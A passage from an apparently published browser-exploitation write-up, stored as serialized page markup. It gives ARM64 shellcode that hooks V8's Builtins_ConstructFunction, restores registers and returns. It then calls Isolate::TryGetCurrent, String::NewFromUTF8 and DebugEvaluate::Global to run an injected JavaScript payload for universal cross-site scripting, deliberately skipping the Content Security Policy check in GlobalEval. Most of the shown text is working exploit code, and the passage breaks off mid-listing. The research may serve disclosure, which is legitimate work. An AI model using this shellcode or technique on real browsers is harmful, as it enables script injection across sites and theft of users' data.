#-16]!\n",{"type":25,"tag":216,"props":144192,"children":144193},{"class":6922,"line":7654},[144194],{"type":25,"tag":216,"props":144195,"children":144196},{},[144197],{"type":31,"value":144198},"str lr, [sp, #-16]!\n",{"type":25,"tag":38,"props":144200,"children":144201},{},[144202],{"type":31,"value":144203},"All registers are saved to the stack because we don't know which registers may be clobbered by functions invoked later.",{"type":25,"tag":38,"props":144205,"children":144206},{},[144207,144209,144214],{"type":31,"value":144208},"The epilogue restores all saved registers, restores the original instructions in ",{"type":25,"tag":82,"props":144210,"children":144212},{"className":144211},[],[144213],{"type":31,"value":143399},{"type":31,"value":144215},", and then returns execution to its beginning:",{"type":25,"tag":206,"props":144217,"children":144219},{"code":144218,"language":143452,"meta":7,"className":143453,"style":7},"// restore original instructions of Builtins_ConstructFunction\nldr lr, [sp], #16\n// move lr to the beginning of Builtins_ConstructFunction\nsub lr, lr, #{5 * INSTR_SIZE}\n{write_sc(orig_compile_instrs, \"lr\")}\n\n// wipe from cache\nmov x0, lr\n{WIPE_CACHE}\n\n// restore original registers\nldp x28, x29, [sp], #16\nldp x26, x27, [sp], #16\nldp x24, x25, [sp], #16\nldp x22, x23, [sp], #16\nldp x20, x21, [sp], #16\nldp x18, x19, [sp], #16\nldp x16, x17, [sp], #16\nldp x14, x15, [sp], #16\nldp x12, x13, [sp], #16\nldp x10, x11, [sp], #16\nldp x8,  x9,  [sp], #16\nldp x6,  x7,  [sp], #16\nldp x4,  x5,  [sp], #16\nldp x2,  x3,  [sp], #16\nldp x0,  x1,  [sp], #16\n\n// Builtins_ConstructFunction doesnt care about x4 and overwrites\n// it immediately, so we can clobber and use it as a return register.\n// This is done so lr isnt clobbered and ConstructFunction knows\n// where to return\nmov x4, lr\n\n// x15 and lr were saved in patched Builtins_ConstructFunction\nldp x15, lr, [sp], #16\n\nret x4\n",[144220],{"type":25,"tag":82,"props":144221,"children":144222},{"__ignoreMap":7},[144223,144231,144239,144247,144255,144263,144270,144277,144285,144292,144299,144307,144315,144323,144331,144339,144347,144355,144363,144371,144379,144387,144395,144403,144411,144419,144427,144434,144442,144450,144458,144466,144474,144481,144489,144497,144504],{"type":25,"tag":216,"props":144224,"children":144225},{"class":6922,"line":6923},[144226],{"type":25,"tag":216,"props":144227,"children":144228},{},[144229],{"type":31,"value":144230},"// restore original instructions of Builtins_ConstructFunction\n",{"type":25,"tag":216,"props":144232,"children":144233},{"class":6922,"line":6769},[144234],{"type":25,"tag":216,"props":144235,"children":144236},{},[144237],{"type":31,"value":144238},"ldr lr, [sp], #16\n",{"type":25,"tag":216,"props":144240,"children":144241},{"class":6922,"line":6778},[144242],{"type":25,"tag":216,"props":144243,"children":144244},{},[144245],{"type":31,"value":144246},"// move lr to the beginning of Builtins_ConstructFunction\n",{"type":25,"tag":216,"props":144248,"children":144249},{"class":6922,"line":7005},[144250],{"type":25,"tag":216,"props":144251,"children":144252},{},[144253],{"type":31,"value":144254},"sub lr, lr, #{5 * INSTR_SIZE}\n",{"type":25,"tag":216,"props":144256,"children":144257},{"class":6922,"line":7110},[144258],{"type":25,"tag":216,"props":144259,"children":144260},{},[144261],{"type":31,"value":144262},"{write_sc(orig_compile_instrs, \"lr\")}\n",{"type":25,"tag":216,"props":144264,"children":144265},{"class":6922,"line":7216},[144266],{"type":25,"tag":216,"props":144267,"children":144268},{"emptyLinePlaceholder":16},[144269],{"type":31,"value":7642},{"type":25,"tag":216,"props":144271,"children":144272},{"class":6922,"line":7244},[144273],{"type":25,"tag":216,"props":144274,"children":144275},{},[144276],{"type":31,"value":143805},{"type":25,"tag":216,"props":144278,"children":144279},{"class":6922,"line":7257},[144280],{"type":25,"tag":216,"props":144281,"children":144282},{},[144283],{"type":31,"value":144284},"mov x0, lr\n",{"type":25,"tag":216,"props":144286,"children":144287},{"class":6922,"line":7275},[144288],{"type":25,"tag":216,"props":144289,"children":144290},{},[144291],{"type":31,"value":143821},{"type":25,"tag":216,"props":144293,"children":144294},{"class":6922,"line":7296},[144295],{"type":25,"tag":216,"props":144296,"children":144297},{"emptyLinePlaceholder":16},[144298],{"type":31,"value":7642},{"type":25,"tag":216,"props":144300,"children":144301},{"class":6922,"line":7305},[144302],{"type":25,"tag":216,"props":144303,"children":144304},{},[144305],{"type":31,"value":144306},"// restore original registers\n",{"type":25,"tag":216,"props":144308,"children":144309},{"class":6922,"line":7557},[144310],{"type":25,"tag":216,"props":144311,"children":144312},{},[144313],{"type":31,"value":144314},"ldp x28, x29, [sp], #16\n",{"type":25,"tag":216,"props":144316,"children":144317},{"class":6922,"line":7574},[144318],{"type":25,"tag":216,"props":144319,"children":144320},{},[144321],{"type":31,"value":144322},"ldp x26, x27, [sp], #16\n",{"type":25,"tag":216,"props":144324,"children":144325},{"class":6922,"line":7591},[144326],{"type":25,"tag":216,"props":144327,"children":144328},{},[144329],{"type":31,"value":144330},"ldp x24, x25, [sp], #16\n",{"type":25,"tag":216,"props":144332,"children":144333},{"class":6922,"line":7604},[144334],{"type":25,"tag":216,"props":144335,"children":144336},{},[144337],{"type":31,"value":144338},"ldp x22, x23, [sp], #16\n",{"type":25,"tag":216,"props":144340,"children":144341},{"class":6922,"line":7613},[144342],{"type":25,"tag":216,"props":144343,"children":144344},{},[144345],{"type":31,"value":144346},"ldp x20, x21, [sp], #16\n",{"type":25,"tag":216,"props":144348,"children":144349},{"class":6922,"line":7636},[144350],{"type":25,"tag":216,"props":144351,"children":144352},{},[144353],{"type":31,"value":144354},"ldp x18, x19, [sp], #16\n",{"type":25,"tag":216,"props":144356,"children":144357},{"class":6922,"line":7645},[144358],{"type":25,"tag":216,"props":144359,"children":144360},{},[144361],{"type":31,"value":144362},"ldp x16, x17, [sp], #16\n",{"type":25,"tag":216,"props":144364,"children":144365},{"class":6922,"line":7654},[144366],{"type":25,"tag":216,"props":144367,"children":144368},{},[144369],{"type":31,"value":144370},"ldp x14, x15, [sp], #16\n",{"type":25,"tag":216,"props":144372,"children":144373},{"class":6922,"line":7722},[144374],{"type":25,"tag":216,"props":144375,"children":144376},{},[144377],{"type":31,"value":144378},"ldp x12, x13, [sp], #16\n",{"type":25,"tag":216,"props":144380,"children":144381},{"class":6922,"line":7730},[144382],{"type":25,"tag":216,"props":144383,"children":144384},{},[144385],{"type":31,"value":144386},"ldp x10, x11, [sp], #16\n",{"type":25,"tag":216,"props":144388,"children":144389},{"class":6922,"line":7760},[144390],{"type":25,"tag":216,"props":144391,"children":144392},{},[144393],{"type":31,"value":144394},"ldp x8,  x9,  [sp], #16\n",{"type":25,"tag":216,"props":144396,"children":144397},{"class":6922,"line":7768},[144398],{"type":25,"tag":216,"props":144399,"children":144400},{},[144401],{"type":31,"value":144402},"ldp x6,  x7,  [sp], #16\n",{"type":25,"tag":216,"props":144404,"children":144405},{"class":6922,"line":7800},[144406],{"type":25,"tag":216,"props":144407,"children":144408},{},[144409],{"type":31,"value":144410},"ldp x4,  x5,  [sp], #16\n",{"type":25,"tag":216,"props":144412,"children":144413},{"class":6922,"line":7808},[144414],{"type":25,"tag":216,"props":144415,"children":144416},{},[144417],{"type":31,"value":144418},"ldp x2,  x3,  [sp], #16\n",{"type":25,"tag":216,"props":144420,"children":144421},{"class":6922,"line":7868},[144422],{"type":25,"tag":216,"props":144423,"children":144424},{},[144425],{"type":31,"value":144426},"ldp x0,  x1,  [sp], #16\n",{"type":25,"tag":216,"props":144428,"children":144429},{"class":6922,"line":13001},[144430],{"type":25,"tag":216,"props":144431,"children":144432},{"emptyLinePlaceholder":16},[144433],{"type":31,"value":7642},{"type":25,"tag":216,"props":144435,"children":144436},{"class":6922,"line":13019},[144437],{"type":25,"tag":216,"props":144438,"children":144439},{},[144440],{"type":31,"value":144441},"// Builtins_ConstructFunction doesnt care about x4 and overwrites\n",{"type":25,"tag":216,"props":144443,"children":144444},{"class":6922,"line":13064},[144445],{"type":25,"tag":216,"props":144446,"children":144447},{},[144448],{"type":31,"value":144449},"// it immediately, so we can clobber and use it as a return register.\n",{"type":25,"tag":216,"props":144451,"children":144452},{"class":6922,"line":13170},[144453],{"type":25,"tag":216,"props":144454,"children":144455},{},[144456],{"type":31,"value":144457},"// This is done so lr isnt clobbered and ConstructFunction knows\n",{"type":25,"tag":216,"props":144459,"children":144460},{"class":6922,"line":27455},[144461],{"type":25,"tag":216,"props":144462,"children":144463},{},[144464],{"type":31,"value":144465},"// where to return\n",{"type":25,"tag":216,"props":144467,"children":144468},{"class":6922,"line":27490},[144469],{"type":25,"tag":216,"props":144470,"children":144471},{},[144472],{"type":31,"value":144473},"mov x4, lr\n",{"type":25,"tag":216,"props":144475,"children":144476},{"class":6922,"line":27498},[144477],{"type":25,"tag":216,"props":144478,"children":144479},{"emptyLinePlaceholder":16},[144480],{"type":31,"value":7642},{"type":25,"tag":216,"props":144482,"children":144483},{"class":6922,"line":27506},[144484],{"type":25,"tag":216,"props":144485,"children":144486},{},[144487],{"type":31,"value":144488},"// x15 and lr were saved in patched Builtins_ConstructFunction\n",{"type":25,"tag":216,"props":144490,"children":144491},{"class":6922,"line":27515},[144492],{"type":25,"tag":216,"props":144493,"children":144494},{},[144495],{"type":31,"value":144496},"ldp x15, lr, [sp], #16\n",{"type":25,"tag":216,"props":144498,"children":144499},{"class":6922,"line":27557},[144500],{"type":25,"tag":216,"props":144501,"children":144502},{"emptyLinePlaceholder":16},[144503],{"type":31,"value":7642},{"type":25,"tag":216,"props":144505,"children":144506},{"class":6922,"line":27590},[144507],{"type":25,"tag":216,"props":144508,"children":144509},{},[144510],{"type":31,"value":144511},"ret x4\n",{"type":25,"tag":38,"props":144513,"children":144514},{},[144515,144517,144522,144524,144529,144531,144537],{"type":31,"value":144516},"At this point, we have successfully hooked ",{"type":25,"tag":82,"props":144518,"children":144520},{"className":144519},[],[144521],{"type":31,"value":143399},{"type":31,"value":144523}," and can execute arbitrary shellcode whenever it is invoked from within the ",{"type":25,"tag":82,"props":144525,"children":144527},{"className":144526},[],[144528],{"type":31,"value":143915},{"type":31,"value":144530}," body. For our purposes, we want to evaluate an arbitrary JavaScript string to achieve UXSS, and the first function we examined for this was ",{"type":25,"tag":82,"props":144532,"children":144534},{"className":144533},[],[144535],{"type":31,"value":144536},"Builtins_GlobalEval",{"type":31,"value":179},{"type":25,"tag":38,"props":144539,"children":144540},{},[144541,144546,144548,144553,144555,144560],{"type":25,"tag":82,"props":144542,"children":144544},{"className":144543},[],[144545],{"type":31,"value":144536},{"type":31,"value":144547}," takes a single ",{"type":25,"tag":82,"props":144549,"children":144551},{"className":144550},[],[144552],{"type":31,"value":51895},{"type":31,"value":144554}," argument that it evaluates. However, it comes with some complications. One notable issue is that it checks whether the Content Security Policy (CSP) allows the use of ",{"type":25,"tag":82,"props":144556,"children":144558},{"className":144557},[],[144559],{"type":31,"value":41511},{"type":31,"value":1472},{"type":25,"tag":206,"props":144562,"children":144564},{"code":144563,"language":33072,"meta":7,"className":33070,"style":7},"BUILTIN(GlobalEval) {\n  [...]\n\n  if (!Builtins::AllowDynamicFunction(isolate, target, target_global_proxy)) {\n    isolate->CountUsage(v8::Isolate::kFunctionConstructorReturnedUndefined);\n    return ReadOnlyRoots(isolate).undefined_value();\n  }\n",[144565],{"type":25,"tag":82,"props":144566,"children":144567},{"__ignoreMap":7},[144568,144581,144588,144595,144638,144660,144686],{"type":25,"tag":216,"props":144569,"children":144570},{"class":6922,"line":6923},[144571,144576],{"type":25,"tag":216,"props":144572,"children":144573},{"style":7047},[144574],{"type":31,"value":144575},"BUILTIN",{"type":25,"tag":216,"props":144577,"children":144578},{"style":6964},[144579],{"type":31,"value":144580},"(GlobalEval) {\n",{"type":25,"tag":216,"props":144582,"children":144583},{"class":6922,"line":6769},[144584],{"type":25,"tag":216,"props":144585,"children":144586},{"style":6964},[144587],{"type":31,"value":131085},{"type":25,"tag":216,"props":144589,"children":144590},{"class":6922,"line":6778},[144591],{"type":25,"tag":216,"props":144592,"children":144593},{"emptyLinePlaceholder":16},[144594],{"type":31,"value":7642},{"type":25,"tag":216,"props":144596,"children":144597},{"class":6922,"line":7005},[144598,144603,144608,144612,144617,144621,144625,144629,144634],{"type":25,"tag":216,"props":144599,"children":144600},{"style":6964},[144601],{"type":31,"value":144602},"  if (!Builtins::",{"type":25,"tag":216,"props":144604,"children":144605},{"style":7375},[144606],{"type":31,"value":144607},"AllowDynamicFunction",{"type":25,"tag":216,"props":144609,"children":144610},{"style":6964},[144611],{"type":31,"value":1850},{"type":25,"tag":216,"props":144613,"children":144614},{"style":7375},[144615],{"type":31,"value":144616},"isolate",{"type":25,"tag":216,"props":144618,"children":144619},{"style":6964},[144620],{"type":31,"value":7026},{"type":25,"tag":216,"props":144622,"children":144623},{"style":7375},[144624],{"type":31,"value":119015},{"type":25,"tag":216,"props":144626,"children":144627},{"style":6964},[144628],{"type":31,"value":7026},{"type":25,"tag":216,"props":144630,"children":144631},{"style":7375},[144632],{"type":31,"value":144633},"target_global_proxy",{"type":25,"tag":216,"props":144635,"children":144636},{"style":6964},[144637],{"type":31,"value":39157},{"type":25,"tag":216,"props":144639,"children":144640},{"class":6922,"line":7110},[144641,144646,144650,144655],{"type":25,"tag":216,"props":144642,"children":144643},{"style":6947},[144644],{"type":31,"value":144645},"    isolate",{"type":25,"tag":216,"props":144647,"children":144648},{"style":6964},[144649],{"type":31,"value":17714},{"type":25,"tag":216,"props":144651,"children":144652},{"style":7047},[144653],{"type":31,"value":144654},"CountUsage",{"type":25,"tag":216,"props":144656,"children":144657},{"style":6964},[144658],{"type":31,"value":144659},"(v8::Isolate::kFunctionConstructorReturnedUndefined);\n",{"type":25,"tag":216,"props":144661,"children":144662},{"class":6922,"line":7216},[144663,144667,144672,144677,144682],{"type":25,"tag":216,"props":144664,"children":144665},{"style":6973},[144666],{"type":31,"value":20947},{"type":25,"tag":216,"props":144668,"children":144669},{"style":7047},[144670],{"type":31,"value":144671}," ReadOnlyRoots",{"type":25,"tag":216,"props":144673,"children":144674},{"style":6964},[144675],{"type":31,"value":144676},"(isolate).",{"type":25,"tag":216,"props":144678,"children":144679},{"style":7047},[144680],{"type":31,"value":144681},"undefined_value",{"type":25,"tag":216,"props":144683,"children":144684},{"style":6964},[144685],{"type":31,"value":7633},{"type":25,"tag":216,"props":144687,"children":144688},{"class":6922,"line":7244},[144689],{"type":25,"tag":216,"props":144690,"children":144691},{"style":6964},[144692],{"type":31,"value":9823},{"type":25,"tag":38,"props":144694,"children":144695},{},[144696,144698,144703],{"type":31,"value":144697},"This means we would need to patch the function further to ensure it never enters this ",{"type":25,"tag":82,"props":144699,"children":144701},{"className":144700},[],[144702],{"type":31,"value":19537},{"type":31,"value":144704}," block.",{"type":25,"tag":38,"props":144706,"children":144707},{},[144708],{"type":31,"value":144709},"Alternatively, we could replicate the calls made once the security checks pass:",{"type":25,"tag":206,"props":144711,"children":144713},{"code":144712,"language":33072,"meta":7,"className":33070,"style":7},"BUILTIN(GlobalEval) {\n\n  [...]\n\n  DirectHandle\u003CJSFunction> function;\n  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(\n      isolate, function,\n      Compiler::GetFunctionFromValidatedString(\n          direct_handle(target->native_context(), isolate), source,\n          NO_PARSE_RESTRICTION, kNoSourcePosition));\n  RETURN_RESULT_OR_FAILURE(\n      isolate, Execution::Call(isolate, function, target_global_proxy, {}));\n",[144714],{"type":25,"tag":82,"props":144715,"children":144716},{"__ignoreMap":7},[144717,144728,144735,144742,144749,144757,144769,144777,144794,144824,144832,144844],{"type":25,"tag":216,"props":144718,"children":144719},{"class":6922,"line":6923},[144720,144724],{"type":25,"tag":216,"props":144721,"children":144722},{"style":7047},[144723],{"type":31,"value":144575},{"type":25,"tag":216,"props":144725,"children":144726},{"style":6964},[144727],{"type":31,"value":144580},{"type":25,"tag":216,"props":144729,"children":144730},{"class":6922,"line":6769},[144731],{"type":25,"tag":216,"props":144732,"children":144733},{"emptyLinePlaceholder":16},[144734],{"type":31,"value":7642},{"type":25,"tag":216,"props":144736,"children":144737},{"class":6922,"line":6778},[144738],{"type":25,"tag":216,"props":144739,"children":144740},{"style":6964},[144741],{"type":31,"value":131085},{"type":25,"tag":216,"props":144743,"children":144744},{"class":6922,"line":7005},[144745],{"type":25,"tag":216,"props":144746,"children":144747},{"emptyLinePlaceholder":16},[144748],{"type":31,"value":7642},{"type":25,"tag":216,"props":144750,"children":144751},{"class":6922,"line":7110},[144752],{"type":25,"tag":216,"props":144753,"children":144754},{"style":6964},[144755],{"type":31,"value":144756},"  DirectHandle\u003CJSFunction> function;\n",{"type":25,"tag":216,"props":144758,"children":144759},{"class":6922,"line":7216},[144760,144765],{"type":25,"tag":216,"props":144761,"children":144762},{"style":7047},[144763],{"type":31,"value":144764},"  ASSIGN_RETURN_FAILURE_ON_EXCEPTION",{"type":25,"tag":216,"props":144766,"children":144767},{"style":6964},[144768],{"type":31,"value":7420},{"type":25,"tag":216,"props":144770,"children":144771},{"class":6922,"line":7244},[144772],{"type":25,"tag":216,"props":144773,"children":144774},{"style":6964},[144775],{"type":31,"value":144776},"      isolate, function,\n",{"type":25,"tag":216,"props":144778,"children":144779},{"class":6922,"line":7257},[144780,144785,144790],{"type":25,"tag":216,"props":144781,"children":144782},{"style":6964},[144783],{"type":31,"value":144784},"      Compiler::",{"type":25,"tag":216,"props":144786,"children":144787},{"style":7047},[144788],{"type":31,"value":144789},"GetFunctionFromValidatedString",{"type":25,"tag":216,"props":144791,"children":144792},{"style":6964},[144793],{"type":31,"value":7420},{"type":25,"tag":216,"props":144795,"children":144796},{"class":6922,"line":7275},[144797,144802,144806,144810,144814,144819],{"type":25,"tag":216,"props":144798,"children":144799},{"style":7047},[144800],{"type":31,"value":144801},"          direct_handle",{"type":25,"tag":216,"props":144803,"children":144804},{"style":6964},[144805],{"type":31,"value":1850},{"type":25,"tag":216,"props":144807,"children":144808},{"style":6947},[144809],{"type":31,"value":119015},{"type":25,"tag":216,"props":144811,"children":144812},{"style":6964},[144813],{"type":31,"value":17714},{"type":25,"tag":216,"props":144815,"children":144816},{"style":7047},[144817],{"type":31,"value":144818},"native_context",{"type":25,"tag":216,"props":144820,"children":144821},{"style":6964},[144822],{"type":31,"value":144823},"(), isolate), source,\n",{"type":25,"tag":216,"props":144825,"children":144826},{"class":6922,"line":7296},[144827],{"type":25,"tag":216,"props":144828,"children":144829},{"style":6964},[144830],{"type":31,"value":144831},"          NO_PARSE_RESTRICTION, kNoSourcePosition));\n",{"type":25,"tag":216,"props":144833,"children":144834},{"class":6922,"line":7305},[144835,144840],{"type":25,"tag":216,"props":144836,"children":144837},{"style":7047},[144838],{"type":31,"value":144839},"  RETURN_RESULT_OR_FAILURE",{"type":25,"tag":216,"props":144841,"children":144842},{"style":6964},[144843],{"type":31,"value":7420},{"type":25,"tag":216,"props":144845,"children":144846},{"class":6922,"line":7557},[144847,144852,144857],{"type":25,"tag":216,"props":144848,"children":144849},{"style":6964},[144850],{"type":31,"value":144851},"      isolate, Execution::",{"type":25,"tag":216,"props":144853,"children":144854},{"style":7047},[144855],{"type":31,"value":144856},"Call",{"type":25,"tag":216,"props":144858,"children":144859},{"style":6964},[144860],{"type":31,"value":144861},"(isolate, function, target_global_proxy, {}));\n",{"type":25,"tag":38,"props":144863,"children":144864},{},[144865,144867,144872,144874,144880,144882,144888,144890,144896],{"type":31,"value":144866},"But determining the correct ",{"type":25,"tag":82,"props":144868,"children":144870},{"className":144869},[],[144871],{"type":31,"value":119015},{"type":31,"value":144873}," value, obtaining ",{"type":25,"tag":82,"props":144875,"children":144877},{"className":144876},[],[144878],{"type":31,"value":144879},"target->native_context()",{"type":31,"value":144881},", and locating the ",{"type":25,"tag":82,"props":144883,"children":144885},{"className":144884},[],[144886],{"type":31,"value":144887},"direct_handle",{"type":31,"value":144889}," function, just to make a proper call to ",{"type":25,"tag":82,"props":144891,"children":144893},{"className":144892},[],[144894],{"type":31,"value":144895},"Compiler::GetFunctionFromValidatedString",{"type":31,"value":144897},", seemed unnecessarily cumbersome.",{"type":25,"tag":38,"props":144899,"children":144900},{},[144901,144903,144909],{"type":31,"value":144902},"Instead, we found a much simpler option with no security checks: ",{"type":25,"tag":82,"props":144904,"children":144906},{"className":144905},[],[144907],{"type":31,"value":144908},"DebugEvaluate::Global",{"type":31,"value":144910},". This function is used by the DevTools console to evaluate JavaScript entered there.",{"type":25,"tag":38,"props":144912,"children":144913},{},[144914],{"type":31,"value":144915},"For our needs, it is straightforward to call:",{"type":25,"tag":206,"props":144917,"children":144919},{"code":144918,"language":33072,"meta":7,"className":33070,"style":7},"MaybeDirectHandle\u003CObject> DebugEvaluate::Global(Isolate* isolate,\n                                                Handle\u003CString> source,\n                                                debug::EvaluateGlobalMode mode,\n                                                REPLMode repl_mode);\n",[144920],{"type":25,"tag":82,"props":144921,"children":144922},{"__ignoreMap":7},[144923,144971,145000,145021],{"type":25,"tag":216,"props":144924,"children":144925},{"class":6922,"line":6923},[144926,144931,144935,144939,144944,144949,144953,144958,144962,144967],{"type":25,"tag":216,"props":144927,"children":144928},{"style":7375},[144929],{"type":31,"value":144930},"MaybeDirectHandle",{"type":25,"tag":216,"props":144932,"children":144933},{"style":6964},[144934],{"type":31,"value":9757},{"type":25,"tag":216,"props":144936,"children":144937},{"style":7375},[144938],{"type":31,"value":52820},{"type":25,"tag":216,"props":144940,"children":144941},{"style":6964},[144942],{"type":31,"value":144943},"> DebugEvaluate::",{"type":25,"tag":216,"props":144945,"children":144946},{"style":7047},[144947],{"type":31,"value":144948},"Global",{"type":25,"tag":216,"props":144950,"children":144951},{"style":6964},[144952],{"type":31,"value":1850},{"type":25,"tag":216,"props":144954,"children":144955},{"style":7375},[144956],{"type":31,"value":144957},"Isolate",{"type":25,"tag":216,"props":144959,"children":144960},{"style":6936},[144961],{"type":31,"value":8519},{"type":25,"tag":216,"props":144963,"children":144964},{"style":6947},[144965],{"type":31,"value":144966}," isolate",{"type":25,"tag":216,"props":144968,"children":144969},{"style":6964},[144970],{"type":31,"value":7465},{"type":25,"tag":216,"props":144972,"children":144973},{"class":6922,"line":6769},[144974,144979,144983,144987,144991,144996],{"type":25,"tag":216,"props":144975,"children":144976},{"style":7375},[144977],{"type":31,"value":144978},"                                                Handle",{"type":25,"tag":216,"props":144980,"children":144981},{"style":6964},[144982],{"type":31,"value":9757},{"type":25,"tag":216,"props":144984,"children":144985},{"style":7375},[144986],{"type":31,"value":51895},{"type":25,"tag":216,"props":144988,"children":144989},{"style":6964},[144990],{"type":31,"value":9772},{"type":25,"tag":216,"props":144992,"children":144993},{"style":6947},[144994],{"type":31,"value":144995},"source",{"type":25,"tag":216,"props":144997,"children":144998},{"style":6964},[144999],{"type":31,"value":7465},{"type":25,"tag":216,"props":145001,"children":145002},{"class":6922,"line":6778},[145003,145008,145013,145017],{"type":25,"tag":216,"props":145004,"children":145005},{"style":6964},[145006],{"type":31,"value":145007},"                                                debug::",{"type":25,"tag":216,"props":145009,"children":145010},{"style":7375},[145011],{"type":31,"value":145012},"EvaluateGlobalMode",{"type":25,"tag":216,"props":145014,"children":145015},{"style":6947},[145016],{"type":31,"value":110232},{"type":25,"tag":216,"props":145018,"children":145019},{"style":6964},[145020],{"type":31,"value":7465},{"type":25,"tag":216,"props":145022,"children":145023},{"class":6922,"line":7005},[145024,145029,145034],{"type":25,"tag":216,"props":145025,"children":145026},{"style":7375},[145027],{"type":31,"value":145028},"                                                REPLMode",{"type":25,"tag":216,"props":145030,"children":145031},{"style":6947},[145032],{"type":31,"value":145033}," repl_mode",{"type":25,"tag":216,"props":145035,"children":145036},{"style":6964},[145037],{"type":31,"value":7797},{"type":25,"tag":38,"props":145039,"children":145040},{},[145041,145043,145048,145050,145055,145057,145062,145064,145070,145071,145077],{"type":31,"value":145042},"We must supply the ",{"type":25,"tag":82,"props":145044,"children":145046},{"className":145045},[],[145047],{"type":31,"value":144616},{"type":31,"value":145049}," pointer, a ",{"type":25,"tag":82,"props":145051,"children":145053},{"className":145052},[],[145054],{"type":31,"value":51895},{"type":31,"value":145056}," object containing our XSS payload as ",{"type":25,"tag":82,"props":145058,"children":145060},{"className":145059},[],[145061],{"type":31,"value":144995},{"type":31,"value":145063},", and the ",{"type":25,"tag":82,"props":145065,"children":145067},{"className":145066},[],[145068],{"type":31,"value":145069},"mode",{"type":31,"value":1307},{"type":25,"tag":82,"props":145072,"children":145074},{"className":145073},[],[145075],{"type":31,"value":145076},"repl_mode",{"type":31,"value":145078}," values, which are simple enum literals.",{"type":25,"tag":38,"props":145080,"children":145081},{},[145082,145084,145089,145091,145097,145099,145104,145106,145111,145113,145119,145121,145127,145129,145134,145136,145141,145143,145148,145150,145155],{"type":31,"value":145083},"To obtain the ",{"type":25,"tag":82,"props":145085,"children":145087},{"className":145086},[],[145088],{"type":31,"value":144616},{"type":31,"value":145090}," pointer within our shellcode, we call ",{"type":25,"tag":82,"props":145092,"children":145094},{"className":145093},[],[145095],{"type":31,"value":145096},"Isolate::TryGetCurrent()",{"type":31,"value":145098},", which returns the current ",{"type":25,"tag":82,"props":145100,"children":145102},{"className":145101},[],[145103],{"type":31,"value":144616},{"type":31,"value":145105},". To construct a valid ",{"type":25,"tag":82,"props":145107,"children":145109},{"className":145108},[],[145110],{"type":31,"value":51895},{"type":31,"value":145112}," object holding our payload, we call ",{"type":25,"tag":82,"props":145114,"children":145116},{"className":145115},[],[145117],{"type":31,"value":145118},"v8::String::NewFromUTF8",{"type":31,"value":145120},". This ",{"type":25,"tag":82,"props":145122,"children":145124},{"className":145123},[],[145125],{"type":31,"value":145126},"NewFromUTF8",{"type":31,"value":145128}," function takes four arguments: the ",{"type":25,"tag":82,"props":145130,"children":145132},{"className":145131},[],[145133],{"type":31,"value":144616},{"type":31,"value":145135},", the string bytes as ",{"type":25,"tag":82,"props":145137,"children":145139},{"className":145138},[],[145140],{"type":31,"value":7669},{"type":31,"value":145142},", an enum literal specifying the string type, and ",{"type":25,"tag":82,"props":145144,"children":145146},{"className":145145},[],[145147],{"type":31,"value":12456},{"type":31,"value":145149},", which is the size of the ",{"type":25,"tag":82,"props":145151,"children":145153},{"className":145152},[],[145154],{"type":31,"value":7669},{"type":31,"value":21122},{"type":25,"tag":38,"props":145157,"children":145158},{},[145159],{"type":31,"value":145160},"The resulting shellcode that executes our XSS payload looks like this:",{"type":25,"tag":206,"props":145162,"children":145164},{"code":145163,"language":143452,"meta":7,"className":143453,"style":7},"// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)\nmovz x1, #0xf7a0\nmovk x1, #0x0071, lsl #16\nadd x9, x12, x1\nmovz x1, #0x5ac8\nmovk x1, #0x054f, lsl #16\nadd x0, x12, x1\nblr x9\n// *x0 is isolate pointer\n// store isolate ptr to stack\nldr x13, [x0]\nstr x13, [sp, #-16]!\n\n// store x10 = v8::String::NewFromUTF8\nmovz x1, #0x1140\nmovk x1, #0x0242, lsl #16\nsub x10, x12, x1\n\n// mmap a RW page for our xss payload\nmov x0, #0\nmov x1, #{page_align(len(XSS_PAYLOAD))}\nmov x2, #3\nmov x3, #34\nmov x4, #-1\nmov x5, #0\nmov x8, #222\nsvc #0\n\n// write our xss payload to mmapped rw page\n{write_str(XSS_PAYLOAD, \"x0\")}\n\n// store x11 = XSS_PAYLOAD string\nmov x11, x0\n\n// pop back isolate pointer\nldr x13, [sp], #16\n\n// at this point:\n// x13 = isolate *\n// x11 = XSS_PAYLOAD string mmapped region\n// x10 = v8::String::NewFromUtf8\n\n// call v8::String::NewFromUTF8 with our xss_payload\n// arg0 = isolate *\nmov x0, x13\n// arg1 = char *c_str\nmov x1, x11\n// arg2 = type = kNormal\nmov x2, #0\n// arg4 = length\nmov w3, #{len(XSS_PAYLOAD)}\n// call NewFromUTF8\nblr x10\n\n// store x14 = String XSS_PAYLOAD\nmov x14, x0\n\n// store x9 = v8::internal::DebugEvaluate::Global\nmovz x1, #0xe44c\nmovk x1, #0x014e, lsl #16\nsub x9, x12, x1\n\n// call v8::internal::DebugEvaluate::Global\n// arg0 = isolate *\nmov x0, x13\n// arg1 = String *source\nmov x1, x14\n// arg2 = mode = kDefault\nmov x2, #0\n// arg3 = repl_mode = kYes\nmov x3, #0\n\nblr x9\n",[145165],{"type":25,"tag":82,"props":145166,"children":145167},{"__ignoreMap":7},[145168,145176,145184,145192,145200,145208,145216,145224,145232,145240,145248,145256,145264,145271,145279,145287,145295,145303,145310,145318,145325,145333,145341,145348,145355,145362,145369,145376,145383,145391,145399,145406,145414,145422,145429,145437,145445,145452,145459,145467,145475,145483,145490,145498,145506,145514,145522,145530,145538,145546,145554,145562,145570,145578,145585,145593,145601,145608,145616,145624,145632,145640,145647,145655,145662,145669,145677,145685,145693,145701,145710,145719,145727],{"type":25,"tag":216,"props":145169,"children":145170},{"class":6922,"line":6923},[145171],{"type":25,"tag":216,"props":145172,"children":145173},{},[145174],{"type":31,"value":145175},"// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)\n",{"type":25,"tag":216,"props":145177,"children":145178},{"class":6922,"line":6769},[145179],{"type":25,"tag":216,"props":145180,"children":145181},{},[145182],{"type":31,"value":145183},"movz x1, #0xf7a0\n",{"type":25,"tag":216,"props":145185,"children":145186},{"class":6922,"line":6778},[145187],{"type":25,"tag":216,"props":145188,"children":145189},{},[145190],{"type":31,"value":145191},"movk x1, #0x0071, lsl #16\n",{"type":25,"tag":216,"props":145193,"children":145194},{"class":6922,"line":7005},[145195],{"type":25,"tag":216,"props":145196,"children":145197},{},[145198],{"type":31,"value":145199},"add x9, x12, x1\n",{"type":25,"tag":216,"props":145201,"children":145202},{"class":6922,"line":7110},[145203],{"type":25,"tag":216,"props":145204,"children":145205},{},[145206],{"type":31,"value":145207},"movz x1, 